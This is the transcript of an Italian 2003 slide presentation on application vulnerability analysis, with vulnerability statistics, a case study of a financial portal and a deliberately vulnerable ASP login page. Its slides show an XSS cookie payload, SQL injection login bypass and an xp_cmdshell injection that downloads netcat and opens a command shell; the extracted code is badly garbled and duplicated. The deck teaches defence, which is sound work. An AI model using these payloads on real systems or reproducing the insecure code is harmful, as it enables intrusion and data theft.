L analisi delle vulnerabilità delle applicazioni

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "L analisi delle vulnerabilità delle applicazioni"

Transcript

1 L analisi delle vulnerabilità delle applicazioni Yann Bongiovanni Presidente di LIVE Network Security AIEA Sessione di Studio Roma, 9 aprile 2003 Milano, 8 maggio 2003

2 Indice Vulnerabilità di pubblico dominio: dati quantitativi e qualitativi Esempi di vulnerabilità applicative Il contesto normativo: dall Orange Book all ISO I limiti nell approccio attuale Struttura di un assessment per un applicazione Case study: Portale finanziario Conclusioni

3 Vulnerabilità nel periodo vulnerabilità segnalate 30 allarmi in media alla settimana Apr Mag Giu Lug Ago Set Ott Nov Dic Gen Feb Mar Fonte: SecurityTracker

4 I top ten tra i produttori 10 produttori erano responsabili di 28% degli allarmi complessivi. A Microsoft sono attribuibili 11,7% delle vulnerabilità segnalate, quattro volte quelle del prossimo in classifica (Sun). Network Associates e Trend Micro sono le uniche società di security a entrare in classifica. Sun HP IBM Cisco Caldera/SCO Oracle Apache SF Trend Micro Fonte: SecurityTracker Microsoft Red Hat Netscape Network Associates

5 Tipi di software vulnerabile La maggior parte delle vulnerabilità riportate (86%) riguarda il livello applicativo, seguono i sistemi operativi e l hardware. La categoria di software più affetta riguarda i web server ed applicazioni web-based. Al secondo posto vi è il software per la security! Seguono server di posta elettronica e i browser web. Device OS OS OS - non classificate - Applicazioni web Applicazioni di security Server Router/Bridge/Hub Web Browser File Transfer UNIX Database Client di posta elettronica Microsoft E-Commerce Multimedia Firewall File Sharing Linux Forum/Board/Portale Instant Messaging/IRC/Chat News 25,9% 22,8% 9,4% 4,8% 4,4% 4,0% 3,3% 3,2% 2,6% 2,3% 2,3% 1,9% 1,9% 1,8% 1,4% 1,2% 0,8% 0,8% 0,7% Device OS OS Device Device Device Device Device Device Device Device Device Device Directory Firewall Mac Giochi altro VPN Stampanti Embedded Server/Appliance Telefoni/Fax Telefoni/Fax Calendari VoIP Gestione certificati digitali Embedded Server Intrusion Detection Crittografia/VPN Multimedia PDA VPN 0,6% 0,5% 0,5% 0,4% 0,4% 0,3% 0,3% 0,2% 0,2% 0,2% 0,1% 0,1% 0,1% 0,1% 0,1% 0,1% 0,1% 0,1% 0,1% Fonte: SecurityTracker

6 Impatto L impatto più frequente (27%) riguarda la possibilità di eseguire codice arbitrario da remoto. La maggior parte delle vulnerabilità (anche quelle classificate diversamente) ha come impatto il denial-of-service. Esecuzione di codice arbitrario dalla rete Denial of service dalla rete Divulgazione di dati utente Divulgazione di dati di sistema Accesso utente da remoto Esecuzione di codice arbitrario dal sistema locale Divulgazione di dati di autenticazione Accesso con i massimi privilegi dal sistema locale Modifica di dati di sistema Accesso con i massimi privilegi dalla rete Accesso utente dalla rete Accesso a risorse di sistema dalla rete Modifica di dati utente Denial of service dal sistema locale Modifica di dati di autenticazione non specificato 27,20% 20,70% 19,20% 18,40% 16,00% 11,70% 10,40% 10,20% 7,80% 7,80% 6,60% 6,50% 6,30% 4,50% 0,90% 0,10% Fonte: SecurityTracker

7 Vulnerabilità riportate dal Input Validation Error Access Validation Error Exceptional Condition Error Environment Error Configuration Error Race Condition Design Error Other Elaborazione LIVE su dati ICAT (icat.nist.gov) aggiornata al

8 Tipi di errore Percentuali calcolate in base ad un campione di 4095 vulnerabilità rilevate nel periodo Access Validation Error 10% Exceptional Condition Error 10% Environment Error 2% Configuration Error 6% Race Condition 2% Input Validation Error 44% Other 1% Design Error 25% Elaborazione LIVE su dati ICAT (icat.nist.gov) aggiornata al

9 Esempio: Architettura client-server Rete e sistemi Internet Internet Web & Application Server Database Server Internet Firewall Perimeter Network Firewall Applicazione MS IIS ASP ODBC sa user MS SQL Server HTTPS anonymous user

10 Dettaglio Applicazione MS IIS ASP ODBC sa user MS SQL Server sclogin.asp HTTPS anonymous user <% Option Explicit <% Dim Option slogin Explicit slogin "" Dim slogin if Request("Accedi") slogin "" "Accedi" then Dim if Request("Accedi") p_strcodicecliente, "Accedi" p_strpassword, then objrs, strsql p_strcodicecliente Dim p_strcodicecliente, Request.Form("CodCli") p_strpassword, objrs, strsql p_strpassword Request.Form("Password") p_strcodicecliente Request.Form("CodCli") strsql p_strpassword "SELECT * FROM Request.Form("Password") tblclienti " & _ "WHERE codcli'" & p_strcodicecliente & _ strsql "' and password'" "SELECT * FROM & p_strpassword tblclienti " & "'" _ "WHERE codcli'" & p_strcodicecliente & _ Set objrs "' and Server.CreateObject("ADODB.Recordset") password'" & p_strpassword & "'" objrs.open strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" Set objrs Server.CreateObject("ADODB.Recordset") If (objrs.eof) objrs.open Then strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" slogin "NOK" Else If (objrs.eof) Then Session("User") slogin "NOK" objrs("codcli") Response.Redirect Else "servizioclienti.asp" End If Session("User") objrs("codcli") Response.Redirect "servizioclienti.asp" Set objrs End If Nothing End If Set objrs Nothing %> <html> End If %> <head> <html> <meta http-equiv"content-language" content"it"> <meta <head> http-equiv"content-type" content"text/html; charsetwindows-1252"> <title>servizio <meta http-equiv"content-language" Clienti MACROBUG</title> content"it"> </head> <meta http-equiv"content-type" content"text/html; charsetwindows-1252"> <title>servizio Clienti MACROBUG</title> <body> </head> <div <body> align"center"> <center> <table <div border"0" align"center"> cellpadding"0" cellspacing"0" style"border-collapse: collapse" bordercolor"#111111" id"autonumber1" width"541"> <center> <table width"198"><font border"0" cellpadding"0" face"lucida cellspacing"0" Sans Unicode"><img style"border-collapse: border"0" src"artwork/j gif"></font></td> collapse" bordercolor"#111111" id"autonumber1" width"541"> width"343"><font face"lucida Sans Unicode">Servizio Clienti MACROBUG<sup> </sup></font><p> <font face"lucida width"198"><font Sans Unicode">L'accesso face"lucida Sans è Unicode"><img riservato ai Clienti border"0" che src"artwork/j gif"></font></td> hanno sottoscritto width"343"><font il contratto face"lucida di assistenza Sans web.</font></p> Unicode">Servizio Clienti MACROBUG<sup> </sup></font><p> <p> </p> <font face"lucida Sans Unicode">L'accesso è riservato ai Clienti che <form hanno method"post"> sottoscritto il contratto di assistenza web.</font></p> <table <p> </p> border"0" cellpadding"0" cellspacing"0" style"border-collapse: collapse" bordercolor"#111111" width"100%" id"autonumber2"> <form method"post"> <table width"36%" border"0" style"padding-top: cellpadding"0" cellspacing"0" 2; padding-bottom: style"border-collapse: 2"><font face"lucida collapse" Sans Unicode">Codice bordercolor"#111111" Cliente width"100%" id"autonumber2"> </font></td> width"64%" width"36%" style"padding-top: style"padding-top: 2; padding-bottom: 2; padding-bottom: 2"><font 2"><font face"lucida face"lucida Sans Sans Unicode"> Unicode">Codice Cliente <input </font></td> type"text" name"codcli" size"10" value"<%request("codcli")%>" style"font-family: Lucida Sans Unicode" maxlength"10"> (10 cifre)</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"><font face"lucida Sans Unicode"> <input type"text" name"codcli" size"10" value"<%request("codcli")%>" style"font-family: Lucida Sans Unicode" maxlength"10"> (10 cifre)</font></td> width"36%" style"padding-top: 2; padding-bottom: 2"><font face"lucida Sans Unicode">Password</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"> <input type"password" width"36%" style"padding-top: name"password" 2; size"29" padding-bottom: style"font-family: 2"><font face"lucida Sans Sans Unicode"></td> Unicode">Password</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"> </table> <input type"password" name"password" size"29" style"font-family: Lucida Sans Unicode"></td> <p align"center"> <input </table> type"submit" value"accedi" name"accedi" style"font-family: Lucida Sans Unicode"></font> </p> <p align"center"> </form> <input type"submit" value"accedi" name"accedi" style"font-family: Lucida Sans Unicode"></font> </td> </p> </form> </td> width"198"> </td> width"343"> <p align"left"><font width"198"> </td> face"lucida Sans Unicode"><br> <% if slogin width"343"> "NOK" then %> Il codice <p align"left"><font cliente o la password face"lucida non sono Sans validi. Unicode"><br> Si prega di ritentare. <% End <% if If slogin %> "NOK" then %> </font></td> Il codice cliente o la password non sono validi. Si prega di ritentare. <% End If %> </font></td> </table> </center> </div> </table> </center> </body> </div> </html> </body> </html>

11 Dettaglio della pagina di login Applicazione MS IIS ASP ODBC sa user MS SQL Server sclogin.asp HTTPS anonymous user <% Option Explicit <% Dim Option slogin Explicit slogin "" Dim slogin if Request("Accedi") slogin "" "Accedi" then Dim if Request("Accedi") p_strcodicecliente, "Accedi" p_strpassword, then objrs, strsql p_strcodicecliente Dim p_strcodicecliente, Request.Form("CodCli") p_strpassword, objrs, strsql <input type"text" name"codcli" p_strpassword Request.Form("Password") p_strcodicecliente Request.Form("CodCli") size"10" strsql p_strpassword "SELECT * FROM Request.Form("Password") tblclienti " & _ "WHERE codcli'" & p_strcodicecliente & _ strsql "' and password'" "SELECT * FROM & p_strpassword tblclienti " & "'" _ "WHERE codcli'" & p_strcodicecliente & _ Set objrs "' and Server.CreateObject("ADODB.Recordset") password'" & p_strpassword & "'" objrs.open strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" Set objrs Server.CreateObject("ADODB.Recordset") If (objrs.eof) objrs.open Then strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" slogin "NOK" Else If (objrs.eof) Then Session("User") slogin "NOK" objrs("codcli") Response.Redirect Else "servizioclienti.asp" End If Session("User") objrs("codcli") Response.Redirect "servizioclienti.asp" Set objrs End If Nothing <input type"text" name"codcli" size"10" value"<%request("codcli")%>" maxlength"10"> maxlength"10"> <input <input type"password" type"password" name"password" name"password" size"29 > size"29 > End If Set objrs Nothing %> <html> End If %> <head> <html> <meta http-equiv"content-language" content"it"> <meta <head> http-equiv"content-type" content"text/html; charsetwindows-1252"> <title>servizio <meta http-equiv"content-language" Clienti MACROBUG</title> content"it"> </head> <meta http-equiv"content-type" content"text/html; charsetwindows-1252"> <title>servizio Clienti MACROBUG</title> <body> </head> <div <body> align"center"> <center> <table <div border"0" align"center"> cellpadding"0" cellspacing"0" style"border-collapse: collapse" bordercolor"#111111" id"autonumber1" width"541"> <center> <table width"198"><font border"0" cellpadding"0" face"lucida cellspacing"0" Sans Unicode"><img style"border-collapse: border"0" src"artwork/j gif"></font></td> collapse" bordercolor"#111111" id"autonumber1" width"541"> width"343"><font face"lucida Sans Unicode">Servizio Clienti MACROBUG<sup> </sup></font><p> <font face"lucida width"198"><font Sans Unicode">L'accesso face"lucida Sans è Unicode"><img riservato ai Clienti border"0" che src"artwork/j gif"></font></td> hanno sottoscritto width"343"><font il contratto face"lucida di assistenza Sans web.</font></p> Unicode">Servizio Clienti MACROBUG<sup> </sup></font><p> <p> </p> <font face"lucida Sans Unicode">L'accesso è riservato ai Clienti che <form hanno method"post"> sottoscritto il contratto di assistenza web.</font></p> <table <p> </p> border"0" cellpadding"0" cellspacing"0" style"border-collapse: collapse" bordercolor"#111111" width"100%" id"autonumber2"> <form method"post"> <table width"36%" border"0" style"padding-top: cellpadding"0" cellspacing"0" 2; padding-bottom: style"border-collapse: 2"><font face"lucida collapse" Sans Unicode">Codice bordercolor"#111111" Cliente width"100%" id"autonumber2"> </font></td> width"64%" width"36%" style"padding-top: style"padding-top: 2; padding-bottom: 2; padding-bottom: 2"><font 2"><font face"lucida face"lucida Sans Sans Unicode"> Unicode">Codice Cliente <input </font></td> type"text" name"codcli" size"10" value"<%request("codcli")%>" style"font-family: Lucida Sans Unicode" maxlength"10"> (10 cifre)</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"><font face"lucida Sans Unicode"> <input type"text" name"codcli" size"10" value"<%request("codcli")%>" style"font-family: Lucida Sans Unicode" maxlength"10"> (10 cifre)</font></td> width"36%" style"padding-top: 2; padding-bottom: 2"><font face"lucida Sans Unicode">Password</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"> <input type"password" width"36%" style"padding-top: name"password" 2; size"29" padding-bottom: style"font-family: 2"><font face"lucida Sans Sans Unicode"></td> Unicode">Password</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"> </table> <input type"password" name"password" size"29" style"font-family: Lucida Sans Unicode"></td> <p align"center"> <input </table> type"submit" value"accedi" name"accedi" style"font-family: Lucida Sans Unicode"></font> </p> <p align"center"> </form> <input type"submit" value"accedi" name"accedi" style"font-family: Lucida Sans Unicode"></font> </td> </p> </form> </td> width"198"> </td> width"343"> <p align"left"><font width"198"> </td> face"lucida Sans Unicode"><br> <% if slogin width"343"> "NOK" then %> Il codice <p align"left"><font cliente o la password face"lucida non sono Sans validi. Unicode"><br> Si prega di ritentare. <% End <% if If slogin %> "NOK" then %> </font></td> Il codice cliente o la password non sono validi. Si prega di ritentare. <% End If %> </font></td> </table> </center> </div> </table> </center> </body> </div> </html> </body> </html>

12 Esempio di errore: Cross-Site Scripting La logica applicativa: L applicazione riceve dall utente una stringa di testo e la utilizza per specificare i criteri di selezione nel database. Per evitare all utente di ridigitare i dati immessi nei campi, l applicazione utilizza i valori forniti dall utente. L errore: L applicazione inserisce i dati forniti dall utente nella stringa che compone il campo XML/HTML senza eseguire una codifica HTML. L impatto: E possibile far eseguire nel browser dell utente codice JavaScript proveniente da un sito estraneo. Il codice viene eseguito nel contesto di sicurezza della pagina principale. Questa vulnerabilità può essere sfruttata per manipolare i contenuti della pagina web o per carpire dati dell utente (cookies o campi di un form).

13 Errore di validazione (XSS) Applicazione MS IIS ASP ODBC sa user MS SQL Server HTTPS anonymous user <input <input type"text" type"text" name"codcli" name"codcli" size"10" size"10" value"<%request("codcli")%>" value"<%request("codcli")%>" maxlength"10"> maxlength"10"> <input <input type"password" type"password" name"password" name"password" size"29 > size"29 > CodCli <input <input type"text" type"text" name"codcli" name"codcli" size"10" size"10" value " maxlength"10"> maxlength"10"> <input <input type"password" type"password" name"password" name"password" size"29 > size"29 >

14 Errore di validazione (XSS) Applicazione MS IIS ASP ODBC sa user MS SQL Server HTTPS anonymous user <input <input type"text" type"text" name"codcli" name"codcli" size"10" size"10" value"<%request("codcli")%>" value"<%request("codcli")%>" maxlength"10"> maxlength"10"> <input <input type"password" type"password" name"password" name"password" size"29 > size"29 > CodCli "> <script> alert(document.cookie) </script> <input <input <input type"text" type"text" name"codcli" name"codcli" size"10" size"10" value""><script>alert(document.cookie) </script><input" maxlength"10"> maxlength"10"> <input <input type"password" type"password" name"password" name"password" size"29 > size"29 >

15 Esempio di errore: SQL Injection La logica applicativa: L applicazione riceve dall utente una stringa di testo e la utilizza per specificare i criteri di selezione nel database. L errore: L applicazione utilizza i dati forniti dall utente per costruire una stringa che contiene il comando SQL (che invierà al database server) senza controllare la presenza di caratteri che delimitano stringhe di testo oppure senza controllare che dati presunti numerici siano effettivamente tali. L impatto: E possibile alterare le istruzioni inviate al database server. In funzione del tipo di database server e del livello di autorizzazioni con cui l applicazione opera nei confronti del database server è possibile operare nel database dell applicazione oppure eseguire comandi arbitrari nel sistema che ospita il database server.

16 Errore di validazione 2 (SQL Injection) Applicazione MS IIS ASP ODBC sa user MS SQL Server sclogin.asp HTTPS anonymous user <% Option Explicit <% Dim Option slogin Explicit slogin "" Dim slogin if Request("Accedi") slogin "" "Accedi" then Dim if Request("Accedi") p_strcodicecliente, "Accedi" p_strpassword, then objrs, strsql p_strcodicecliente p_strcodicecliente Request.Form("CodCli") Request.Form("CodCli") p_strpassword p_strpassword Request.Form("Password") Request.Form("Password") strsql strsql "SELECT "SELECT * * FROM FROM tblclienti tblclienti WHERE WHERE codcli'" codcli'" & & p_strcodicecliente p_strcodicecliente & & "' "' and and password'" password'" & & p_strpassword p_strpassword & & "'" "'" Set Set objrs objrs Server.CreateObject("ADODB.Recordset") Server.CreateObject("ADODB.Recordset") objrs.open objrs.open strsql, strsql, "DRIVERSQL "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" Server;UIDsa;SERVERLIVE-VM02" If If (objrs.eof) (objrs.eof) Then Then slogin slogin "NOK" "NOK" Else Else Session("User") Session("User") objrs("codcli") objrs("codcli") Response.Redirect Response.Redirect "servizioclienti.asp" "servizioclienti.asp" End End If If p_strcodicecliente Dim p_strcodicecliente, Request.Form("CodCli") p_strpassword, objrs, strsql p_strpassword Request.Form("Password") p_strcodicecliente Request.Form("CodCli") strsql p_strpassword "SELECT * FROM Request.Form("Password") tblclienti " & _ "WHERE codcli'" & p_strcodicecliente & _ strsql "' and password'" "SELECT * FROM & p_strpassword tblclienti " & "'" _ "WHERE codcli'" & p_strcodicecliente & _ Set objrs "' and Server.CreateObject("ADODB.Recordset") password'" & p_strpassword & "'" objrs.open strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" Set objrs Server.CreateObject("ADODB.Recordset") If (objrs.eof) objrs.open Then strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" slogin "NOK" Else If (objrs.eof) Then Session("User") slogin "NOK" objrs("codcli") Response.Redirect Else "servizioclienti.asp" End If Session("User") objrs("codcli") Response.Redirect "servizioclienti.asp" Set objrs End If Nothing End If Set objrs Nothing %> <html> End If %> <head> <html> <meta http-equiv"content-language" content"it"> <meta <head> http-equiv"content-type" content"text/html; charsetwindows-1252"> <title>servizio <meta http-equiv"content-language" Clienti MACROBUG</title> content"it"> </head> <meta http-equiv"content-type" content"text/html; charsetwindows-1252"> <title>servizio Clienti MACROBUG</title> <body> </head> <div <body> align"center"> <center> <table <div border"0" align"center"> cellpadding"0" cellspacing"0" style"border-collapse: collapse" bordercolor"#111111" id"autonumber1" width"541"> <center> <table width"198"><font border"0" cellpadding"0" face"lucida cellspacing"0" Sans Unicode"><img style"border-collapse: border"0" src"artwork/j gif"></font></td> collapse" bordercolor"#111111" id"autonumber1" width"541"> width"343"><font face"lucida Sans Unicode">Servizio Clienti MACROBUG<sup> </sup></font><p> <font face"lucida width"198"><font Sans Unicode">L'accesso face"lucida Sans è Unicode"><img riservato ai Clienti border"0" che src"artwork/j gif"></font></td> hanno sottoscritto width"343"><font il contratto face"lucida di assistenza Sans web.</font></p> Unicode">Servizio Clienti MACROBUG<sup> </sup></font><p> <p> </p> <font face"lucida Sans Unicode">L'accesso è riservato ai Clienti che <form hanno method"post"> sottoscritto il contratto di assistenza web.</font></p> <table <p> </p> border"0" cellpadding"0" cellspacing"0" style"border-collapse: collapse" bordercolor"#111111" width"100%" id"autonumber2"> <form method"post"> <table width"36%" border"0" style"padding-top: cellpadding"0" cellspacing"0" 2; padding-bottom: style"border-collapse: 2"><font face"lucida collapse" Sans Unicode">Codice bordercolor"#111111" Cliente width"100%" id"autonumber2"> </font></td> width"64%" width"36%" style"padding-top: style"padding-top: 2; padding-bottom: 2; padding-bottom: 2"><font 2"><font face"lucida face"lucida Sans Sans Unicode"> Unicode">Codice Cliente <input </font></td> type"text" name"codcli" size"10" value"<%request("codcli")%>" style"font-family: Lucida Sans Unicode" maxlength"10"> (10 cifre)</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"><font face"lucida Sans Unicode"> <input type"text" name"codcli" size"10" value"<%request("codcli")%>" style"font-family: Lucida Sans Unicode" maxlength"10"> (10 cifre)</font></td> width"36%" style"padding-top: 2; padding-bottom: 2"><font face"lucida Sans Unicode">Password</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"> <input type"password" width"36%" style"padding-top: name"password" 2; size"29" padding-bottom: style"font-family: 2"><font face"lucida Sans Sans Unicode"></td> Unicode">Password</font></td> width"64%" style"padding-top: 2; padding-bottom: 2"> </table> <input type"password" name"password" size"29" style"font-family: Lucida Sans Unicode"></td> <p align"center"> <input </table> type"submit" value"accedi" name"accedi" style"font-family: Lucida Sans Unicode"></font> </p> <p align"center"> </form> <input type"submit" value"accedi" name"accedi" style"font-family: Lucida Sans Unicode"></font> </td> </p> </form> </td> width"198"> </td> width"343"> <p align"left"><font width"198"> </td> face"lucida Sans Unicode"><br> <% if slogin width"343"> "NOK" then %> Il codice <p align"left"><font cliente o la password face"lucida non sono Sans validi. Unicode"><br> Si prega di ritentare. <% End <% if If slogin %> "NOK" then %> </font></td> Il codice cliente o la password non sono validi. Si prega di ritentare. <% End If %> </font></td> </table> </center> </div> </table> </center> </body> </div> </html> </body> </html>

17 Errore di validazione 2 (SQL Injection) Applicazione MS IIS ASP ODBC sa user MS SQL Server Password macrobug CodCli HTTPS anonymous user p_strcodicecliente Request.Form("CodCli") p_strcodicecliente Request.Form("CodCli") p_strpassword Request.Form("Password") p_strpassword Request.Form("Password") strsql "SELECT * FROM tblclienti WHERE codcli'" & _ strsql "SELECT * FROM tblclienti WHERE codcli'" & _ p_strcodicecliente & "' and password'" & p_strpassword & "'" p_strcodicecliente & "' and password'" & p_strpassword & "'" Set objrs Server.CreateObject("ADODB.Recordset") Set objrs Server.CreateObject("ADODB.Recordset") objrs.open strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" objrs.open strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" If (objrs.eof) Then If (objrs.eof) Then slogin "NOK" slogin "NOK" Else Else Session("User") objrs("codcli") Session("User") objrs("codcli") Response.Redirect "servizioclienti.asp" Response.Redirect "servizioclienti.asp" End If End If strsql SELECT * FROM tblclienti WHERE CodCli ' ' AND Password 'macrobug'

18 Esempio: SQL Injection Applicazione Password HTTPS anonymous user MS IIS ASP ODBC sa user MS SQL Server p_strcodicecliente Request.Form("CodCli") p_strpassword p_strcodicecliente Request.Form("Password") Request.Form("CodCli") p_strpassword Request.Form("Password") strsql "SELECT * FROM tblclienti WHERE codcli'" & _ strsql p_strcodicecliente "SELECT * FROM & "' and tblclienti password'" WHERE & p_strpassword codcli'" & _ & "'" p_strcodicecliente & "' and password'" & p_strpassword & "'" Set objrs Server.CreateObject("ADODB.Recordset") objrs.open Set strsql, Server.CreateObject("ADODB.Recordset") "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" objrs.open strsql, "DRIVERSQL Server;UIDsa;SERVERLIVE-VM02" If (objrs.eof) Then slogin If (objrs.eof) "NOK" Then Else slogin "NOK" Session("User") Else objrs("codcli") Response.Redirect Session("User") "servizioclienti.asp" objrs("codcli") End If Response.Redirect "servizioclienti.asp" End If CodCli ' OR strsql SELECT * FROM tblclienti WHERE CodCli '' OR 11 --' AND Password ''

19 Esempio: SQL Injection Applicazione MS IIS ASP ODBC sa user MS SQL Server cmd.exe Password HTTPS anonymous user CodCli ' EXEC xp_cmdshell 'tftp i get nc.exe c:\temp\nc.exe && c:\temp\nc.exe d e cmd.exe '-- strsql SELECT * FROM tblclienti WHERE CodCli '' EXEC xp_cmdshell 'tftp i get nc.exe c:\temp\nc.exe && c:\temp\nc.exe d e cmd.exe ' -- AND Password 'macrobug'

20 Il contesto normativo (1/2) 1980: Gli Stati Uniti sviluppano "Trusted Computer System Evaluation Criteria (TCSEC)" : Nella decade successiva, alcuni paesi europei (Francia, Germania, Olanda, e Regno Unito) sviluppano "Information Technology Security Evaluation Criteria (ITSEC)" pubblicato nel 1991 dalla Commissione Europea. Lo standard si basa su TCSEC, ma tiene conto della rapida evoluzione dell'it. 1990: La ISO crea un gruppo di lavoro (WG 3) all'interno del sottocomitato 27 (SC 27) del Joint Tecnical Committee 1 (JTC 1) allo scopo di creare uno standard internazionale. 1993: Il Canada pubblica "Canadian Trusted Computer Product Evaluation Criteria (CTCPEC)", una combinazione tra TCSEC e ITSEC. 1993: Anche gli Stati Uniti recepiscono le innovazioni di ITSEC in una prima bozza dei "Federal Criteria for Information Technology Security (FC)"

21 Il contesto normativo (2/2) 1993: Le organizzazioni sponsor di ITSEC, CTCPEC, FC e TCSEC (Canada, Francia, Germania, Olanda, Stati Uniti) si uniscono in un progetto di armonizzazione chiamato "Common Criteria (CC) Project". 1996: La versione 1.0 dei CC viene completata in gennaio 1996 e approvata da ISO in aprile : Dopo tre anni di esperienza nell'applicazione della norma viene pubblicata la versione 2.1 come ISO/IEC : Australia, Canada, Finlandia, Francia, Gran Bretagna, Germania, Grecia, Italia, Norvegia, Nuova Zelanda, Olanda, Spagna e Stati Uniti firmano l'accordo di riconoscimento reciproco di certificati e profili di sicurezza basati sui CC.

22 I limiti dell approccio attuale L analisi delle vulnerabilità a livello applicativo non viene presa in considerazione oppure viene percepita come secondaria rispetto a quella delle infrastrutture laboriosa (e quindi troppo costosa) invasiva (se include attività di code analysis) Nei security assessment non si tiene conto delle applicazioni sono rilevate solo le vulnerabilità della rete e dei sistemi sono rilevate parzialmente solo le relazioni di trust evidenti a livello di rete Ne risulta uno sbilanciamento delle priorità a favore della sicurezza nella gestione dei sistemi un falso senso di sicurezza dovuto ad un elevato livello di vulnerabilità nelle applicazioni.

23 ISO/IEC Security Context

24 CC Security Environment

25 CC Security Requirements and Specification

26 Struttura di un vulnerability assessment 1. Rilevazione dell architettura applicativa 2. Analisi dei possibili attacchi e del loro impatto 3. Individuazione di una baseline riconosciuta per il livello di protezione rilevato 4. Rilevazione delle misure di sicurezza esistenti 5. Analisi delle vulnerabilità su un campione di codice applicativo (code analysis) 6. Gap Analysis (tra baseline e misure di sicurezza rilevate) 7. Elenco delle misure di sicurezza assenti o insufficientemente implementate e delle relative minacce 8. Elaborazione di raccomandazioni e suggerimenti

27 Case Study: Portale Finanziario Ambito: Insieme di portali rivolti distinte tipologie di utenti Utenze registrate: ca Utenze previste nel breve-medio termine: Applicazione distribuita su 9 sistemi Sistemi operativi utilizzati: Windows, UNIX, MVS Struttura applicativa multilivello con Portal Server, Application Server, Database Server e Transaction Processing System di back end 3882 file con codice Visual Basic 533 file con codice Java 8599 file di altro genere Obiettivi: rilevare un numero significativo di vulnerabilità con un approccio grey-box individuare azioni indirizzate all abbassamento del livello di esposizione al rischio

28 Case Study: Attività svolta 1. Rilevazione delle configurazioni hardware/software e determinazione dell ambito di analisi 2. Analisi di un campione ristretto e sviluppo di test automatizzati. 3. Estensione dell analisi con test automatizzati. 4. Classificazione delle vulnerabilità riscontrate. 5. Valutazione complessiva e documentazione dei risultati. 6. Individuazione di possibili azioni correttive

29 Case Study: Problemi riscontrati I portali presentavano numerose vulnerabilità causate da errori di programmazione 252 errori di validazione dell input 293 errori di autenticazione e di controllo degli accessi 28 errori di design 96 programmi con chiavi di autenticazione in chiaro (67 accessibili all utente anonimo da Internet) Le possibili violazioni comprendevano l accesso a dati riservati di utenti (39% dei casi) la manipolazione dei dati inviati dal portale all utente (54% dei casi) la modifica arbitraria di dati nel database dei portali (1% dei casi) la generazione di denial-of-service (22% dei casi)

30 Case Study: Problemi riscontrati (cont.) L architettura di sicurezza non era adatta a contenere l impatto, che era sempre grave in quanto il web/portal server operava con i massimi privilegi concessi dal sistema operativo; nel web/portal server erano presenti e facilmente accessibili le chiavi di accesso ai database e ad altri sistemi; l application server concedeva all utente anonimo diritti di esecuzione sulle applicazioni di tutti i portali; i meccanismi di auditing implementati non permettevano di monitorare sufficientemente le vulnerabilità presenti; il numero di interconnessioni tra i confini di sicurezza era troppo elevato per permettere un controllo efficace (oltre 100 connessioni indipendenti al database server).

31 Problemi riscontrati (cont.) L architettura di sicurezza presentava limitazioni di interoperabilità con applicazioni esterne per quanto concerne single sign-on (accesso da e verso i servizi del portale) web services (le funzioni di autenticazione e controllo accessi erano legate all interfaccia utente; non era previsto un controllo accessi per applicazioni esterne) L organizzazione dei processi non premetteva di ottenere maggiore sicurezza: il processo di trasporto (dallo sviluppo alla produzione) non prevedeva la verifica della sicurezza; non esistevano requisiti e specifiche di sicurezza per le applicazioni; non esistevano politiche e procedure di sicurezza per lo sviluppo e la produzione.

32 Aree di intervento Revisione dell'architettura di sicurezza Riduzione della vulnerabilità complessiva attraverso l uso di profili di autorizzazione più restrittivi (role-based access control) Ridisegno dell architettura applicativa al fine di restringere i punti di interazione con i trust boundary. Progettazione e realizzazione di un'architettura che integra le funzioni di Identity & Privilege Management Revisione del codice applicativo Workshop di sensibilizzazione Eliminazione puntuale delle vulnerabilità accertate Code review su tutto il codice prima di qualsiasi rilascio Verifica dei risultati Definizione e diffusione obiettivi e politiche di sicurezza concernenti Lo sviluppo, il rilascio, l'installazione e la gestione delle applicazioni e dei sistemi che compongono l'area portale

33 I principi Per costruire sistemi applicativi più sicuri è necessario Definire correttamente requisiti e specifiche di sicurezza (descrivere quali caratteristiche di sicurezza vogliamo e cosa deve fare chi le sviluppa per realizzarle) Definire delle metriche per la sicurezza e applicare procedure di testing, valutazione e assessment (controllare che abbiamo ottenuto ciò che abbiamo richiesto)

34 Conclusioni I dati sulle vulnerabilità nei software più diffusi evidenziano quanto sia importante individuare ed abbassare il livello di vulnerabilità delle applicazioni. Per poter anche solo monitorare le vulnerabilità esistenti è necessario conoscerne la tipologia presente. Le attività di security testing attualmente praticate forniscono un quadro parziale, insufficiente per proteggere dai rischi più gravi. Per abbassare il livello di vulnerabilità delle applicazioni è necessario definire requisiti e specifiche di sicurezza e controllarne l applicazione. L analisi delle vulnerabilità delle applicazioni è il primo passo in questa direzione.

Quanto è sicuro il Remote Banking? Esperienze di Vulnerability Assessment a confronto

Quanto è sicuro il Remote Banking? Esperienze di Vulnerability Assessment a confronto Quanto è sicuro il Remote Banking? Esperienze di Vulnerability Assessment a confronto Yann Bongiovanni Presidente di LIVE Network Security AIEA Sessione di Studio Milano, 24 marzo 2004 Breve presentazione

Dettagli

Applicazione ASP di esempio

Applicazione ASP di esempio Applicazione ASP di esempio Database in rete Prof. Claudio Maccherani Un server web è un programma che gira su un computer sempre collegato ad Internet e che mette a disposizione file, pagine e servizi.

Dettagli

Laboratorio di Applicazioni Internet Anno Accademico 2005/2006

Laboratorio di Applicazioni Internet Anno Accademico 2005/2006 Laboratorio di Applicazioni Internet Anno Accademico 2005/2006 Tito Flagella (tito@link.it) Domenico Aquilino (d.aquilino@metaware.it) Dipartimento di Informatica Università di Pisa Orario Mercoledì, 9-11

Dettagli

GESTIONE DI MDB in WEB

